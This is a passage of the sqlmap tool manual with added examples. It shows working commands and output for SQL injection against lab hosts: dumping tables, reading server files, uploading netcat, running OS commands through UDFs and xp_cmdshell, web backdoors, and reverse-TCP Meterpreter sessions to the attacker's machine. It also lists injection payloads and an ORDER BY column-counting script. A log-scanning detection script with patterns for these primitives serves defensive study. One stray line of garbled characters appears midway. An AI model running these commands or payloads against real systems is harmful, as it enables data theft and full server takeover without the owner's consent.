Sometimes you only want the number of entries in a table rather than its contents; the --count switch returns exactly that.

An example against Microsoft SQL Server:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+
Dump the entries of a table

Parameters: --dump, -C, -T, -D, --start, --stop, --first, --last

If the session user has privileges to read a table in the database, the whole table can be dumped. Use -D and -T to name the database and the table; when -D is omitted, sqlmap uses the current database.

An example against Firebird:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+

With --dump and -D only (no -T or -C), every table in that database is dumped; with --dump and -C, only the named columns are dumped. sqlmap also writes one CSV file per dumped table.
If you only want a slice of the entries, use --start and --stop: --stop 1 dumps only the first entry, and --start 1 --stop 3 dumps the second and third.

--first and --last select a character range inside each entry: --first 3 --last 5 retrieves the third through fifth characters. These two options only matter for blind techniques, because every other technique retrieves the complete value in one request and never has to guess it character by character.

Dump all databases' tables

Parameters: --dump-all, --exclude-sysdbs
--dump-all dumps the entries of every table in every database. Add --exclude-sysdbs to dump only user databases. Note that on Microsoft SQL Server the master database is not treated as a system database, because some administrators use it as a user database.
Read a file from the database server's file system

Parameters: --file-read

Supported when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the session user has the privileges needed for the DBMS-specific functions involved. The file read can be text or binary.

An example against Microsoft SQL Server 2005:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1
[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe

$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

The remote path is flattened into the local file name (':' and '/' become '_'), and the ls and file checks above are the practical way to confirm that a binary came back intact rather than truncated or mangled by a text conversion.
Upload a file to the database server's file system

Parameters: --file-write, --file-dest

Supported when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the session user has the privileges needed for the DBMS-specific functions involved. The uploaded file can be text or binary.

An example against MySQL:

$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/software/nc.exe.packed'

The confirmation step only compares the size the DBMS reports for the written file with the local size; it does not hash the content, so a write that was corrupted but kept the same length would still pass.
Run arbitrary operating system commands

Parameters: --os-cmd, --os-shell

Supported when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the session user has the privileges needed for the DBMS-specific functions involved.

On MySQL and PostgreSQL, sqlmap uploads a binary library containing two user-defined functions, sys_exec() and sys_eval(), creates them in the database, and then calls them to execute operating system commands. On Microsoft SQL Server, sqlmap uses the xp_cmdshell stored procedure: if it is disabled (the default on Microsoft SQL Server 2005 and later), sqlmap re-enables it; if it has been removed, sqlmap re-creates it.

An example against PostgreSQL:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
--os-cmd id -v 1
[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can
only be deleted manually

Two things in that output are worth noting. The command runs as the DBMS service account (here postgres, not root), so its reach is bounded by that account's privileges. And sqlmap's cleanup drops the functions but leaves the shared object on disk, which is both a forensic artifact for the defender and something to remove by hand on an engagement.

--os-shell offers the same capability as a simulated interactive shell in which you type the commands to run.

When stacked queries cannot be used (for instance PHP or ASP front-ends with a MySQL back-end, whose default connectors do not support them), it is still possible to write a web backdoor into a writable directory with INTO OUTFILE and run commands through it. Supported languages:

1. ASP
2. ASP.NET
3. JSP
4. PHP
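Everything in the three sections above leaves statements in the DBMS query log, so here is an added example (not sqlmap code) of the detection side: a scanner that flags the primitives named on this page in log lines. sqlmap's exact statements are not shown on this page, so the regular expressions are my own choices for those primitives (UDF creation from a dropped shared library on MySQL and PostgreSQL, sp_configure re-enabling xp_cmdshell, sp_addextendedproc re-adding it, xp_cmdshell execution, INTO OUTFILE/DUMPFILE writes, LOAD_FILE reads); the log lines and library file names are constructed for the demo.

```python
"""Added example: flag database-takeover primitives in DBMS query logs.
Not sqlmap's code.  Patterns are illustrative indicators chosen by the
editor for the primitives this page describes, not a complete signature set."""
import re

# One (name, regex) pair per primitive.  Case-insensitive because SQL is.
INDICATORS = [
    ("mysql_udf_create",
     re.compile(r"\bCREATE\s+FUNCTION\s+(sys_exec|sys_eval|sys_bineval)\b.*\bSONAME\b", re.I)),
    ("pgsql_udf_create",
     re.compile(r"\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\s+(sys_exec|sys_eval|sys_bineval)\b"
                r".*\bLANGUAGE\s+C\b", re.I)),
    ("mssql_xp_cmdshell_enable",          # the re-enable step for MSSQL 2005+
     re.compile(r"\bsp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)),
    ("mssql_xp_cmdshell_readd",           # re-creating a removed xp_cmdshell
     re.compile(r"\bsp_addextendedproc\s+'xp_cmdshell'", re.I)),
    ("mssql_xp_cmdshell_exec",            # actual command execution
     re.compile(r"\bxp_cmdshell\s+'", re.I)),
    ("mysql_file_write",                  # --file-write / web backdoor drop
     re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("mysql_file_read",                   # --file-read
     re.compile(r"\bLOAD_FILE\s*\(", re.I)),
]

# Constructed sample, not a real capture: a MySQL/MSSQL/PostgreSQL mix with
# benign queries around a UDF drop, an xp_cmdshell re-enable and a file read.
LOG_LINES = [
    "mysql  Query  SELECT name FROM users WHERE id=1",
    "mysql  Query  SELECT 0x4d5a9000 INTO DUMPFILE '/usr/lib/mysql/plugin/libdemo.so'",
    "mysql  Query  CREATE FUNCTION sys_exec RETURNS int SONAME 'libdemo.so'",
    "mysql  Query  SELECT LOAD_FILE('C:/example.exe')",
    "mssql  EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE",
    "mssql  EXEC master..sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "mssql  EXEC master..xp_cmdshell 'whoami'",
    "mssql  EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'",
    "pgsql  CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/libdemo.so', "
    "'sys_eval' LANGUAGE C STRICT",
    "mysql  Query  SELECT name FROM users WHERE id=2",
]


def scan(lines):
    """Return [(line_number, [indicator names])] for every matching line."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = [name for name, rx in INDICATORS if rx.search(line)]
        if names:
            hits.append((n, names))
    return hits


EXEC_PRIMITIVES = {"mysql_udf_create", "pgsql_udf_create", "mssql_xp_cmdshell_enable",
                   "mssql_xp_cmdshell_readd", "mssql_xp_cmdshell_exec"}
FILE_PRIMITIVES = {"mysql_file_write", "mysql_file_read"}


def takeover_stage(hits):
    """Collapse hits into the highest stage reached: 'exec' when a
    command-execution primitive was created, enabled or used; 'file' when
    only file-system access was seen; None when nothing matched."""
    names = {name for _, found in hits for name in found}
    if names & EXEC_PRIMITIVES:
        return "exec"
    if names & FILE_PRIMITIVES:
        return "file"
    return None


if __name__ == "__main__":
    for n, names in scan(LOG_LINES):
        print(f"line {n}: {', '.join(names)}")
    print("stage:", takeover_stage(scan(LOG_LINES)))
```

Feed it a MySQL general log, a PostgreSQL statement log or SQL Server audit output instead of the constructed list. The names sys_exec/sys_eval/sys_bineval are the ones this page shows sqlmap using; an attacker can rename the functions, so treat a CREATE FUNCTION with SONAME or LANGUAGE C from the web application's account as the real signal and the names as confirmation.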
Out-of-band connection: Meterpreter and friends

Parameters: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path, --tmp-path

Supported when the DBMS is MySQL, PostgreSQL or Microsoft SQL Server and the session user has the privileges needed for the DBMS-specific functions involved. sqlmap can establish an out-of-band TCP connection between the database server and the attacker's machine, for instance an interactive Meterpreter session. sqlmap has Metasploit generate the shellcode and offers four ways to execute it:

1. In memory, through the user-defined function sys_bineval(); supported on MySQL and PostgreSQL; option --os-pwn.
2. By uploading a stand-alone payload stager and executing it through a user-defined function, sys_exec() on MySQL and PostgreSQL or the xp_cmdshell stored procedure on Microsoft SQL Server; option --os-pwn.
3. Through an SMB reflection attack (MS08-068) with a UNC path request from the database server to the attacker's machine; this requires sqlmap itself to run with high privileges (uid=0 on Linux/Unix) and the target DBMS to run as Administrator on Windows; option --os-smbrelay.
4. By exploiting a buffer overflow in the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004) to execute the Metasploit payload in memory; option --os-bof.

An example against MySQL:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying
operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
Parse and display DBMS error messages

Parameters: --parse-errors

Sometimes the target has DBMS error reporting left on, so a failing SQL statement puts the DBMS error message into the response. This switch makes sqlmap parse those messages out of the page and display them. It is also why the column count below is found so quickly: every ORDER BY position that is out of range is reported verbatim by the server.

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
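An added example (not sqlmap code) of what --parse-errors makes possible: pulling the SQL Server message out of a verbose ASP error page and using the 'ORDER BY position number N is out of range' message as an oracle, so the number of columns in the vulnerable query is found by binary search rather than by probing positions one at a time. The target is a constructed stand-in for get_int.asp with error reporting left on; its normal page body and the probing order are invented for the demo.

```python
"""Added example: ORDER BY column-count discovery driven by parsed DBMS
errors.  Not sqlmap's code; the target below is a constructed stand-in."""
import re

# The DBMS text sits after the driver prefix in the classic ASP error page.
SQLSERVER_MSG = re.compile(r"\[SQL Server\](?P<msg>[^<\n]+)")
ORDER_BY_RANGE = re.compile(r"ORDER BY position number (\d+) is out of range")


def parse_error(body: str):
    """Return the SQL Server message from an error page, or None for a
    normal page (the equivalent of sqlmap's 'parsed error message' line)."""
    m = SQLSERVER_MSG.search(body)
    return m.group("msg").strip() if m else None


def order_by_position(msg):
    """Column position the server rejected, or None if the message is not
    an ORDER BY out-of-range error (or there was no message at all)."""
    m = ORDER_BY_RANGE.search(msg or "")
    return int(m.group(1)) if m else None


def make_target(n_columns: int):
    """Constructed stand-in for ?id=1 ORDER BY N against a select list of
    n_columns items, with error reporting on.  Returns request(N) -> body."""
    def request(n: int) -> str:
        if n > n_columns:
            return ("Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n"
                    "[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position "
                    f"number {n} is out of range of the number of items in the select list.\n"
                    "<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>")
        return "<html><body>luther blisset</body></html>"   # normal page
    return request


def find_column_count(request, upper: int = 20):
    """Binary search for the largest N such that ORDER BY N does not error.
    Returns (count, probes).  count is None when ORDER BY `upper` is still
    in range, i.e. the query has more than `upper` columns."""
    probes = [upper]
    if order_by_position(parse_error(request(upper))) is None:
        return None, probes
    lo, hi = 1, upper - 1                  # invariant: count in [lo, hi]
    while lo < hi:
        mid = (lo + hi + 1) // 2
        probes.append(mid)
        if order_by_position(parse_error(request(mid))) is None:
            lo = mid                       # mid is a valid column position
        else:
            hi = mid - 1                   # mid is out of range
    return lo, probes


if __name__ == "__main__":
    target = make_target(3)
    print(parse_error(target(7)))
    print(find_column_count(target))
```

Without the parsed error the same search would have to fall back on comparing page content for each probe, which is slower and noisier; with it, five requests settle a 20-column range. The check for `upper` first is the edge case that matters in practice: a wide select list must produce a "more than 20" answer rather than a wrong count.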
3 V: m' Q6 u1 w, |( e7 E+ u
Miscellaneous options

Conduct thorough tests only on positive heuristics

Parameters: --smart

When you are testing a large number of target URLs and want to save time, --smart makes sqlmap run its full battery of tests only against parameters whose heuristic check (for instance a DBMS error in the response) already suggests they are injectable; parameters that look neither dynamic nor injectable are skipped.

Example:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]

Simple wizard interface for beginner users

Parameters: --wizard

Aimed at first-time users: it asks a few questions step by step and then runs the injection against the target for you.

$ python sqlmap.py --wizard
    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user: 'sa'
current database: 'testdb'
current user is DBA: True

The CHAR() chains in the error-based, UNION and inline payloads are plain Transact-SQL string concatenation (+) spelling out the delimiter pairs ':vrd:' and ':omq:' that sqlmap wraps around its own output so it can find it in the response; the CASE expression between them is the condition being tested. Note the last three lines as well: the application connects as sa and the user is DBA, which is exactly the position from which every takeover feature earlier on this page (file read and write, xp_cmdshell, --os-pwn) is reachable through this one injection point.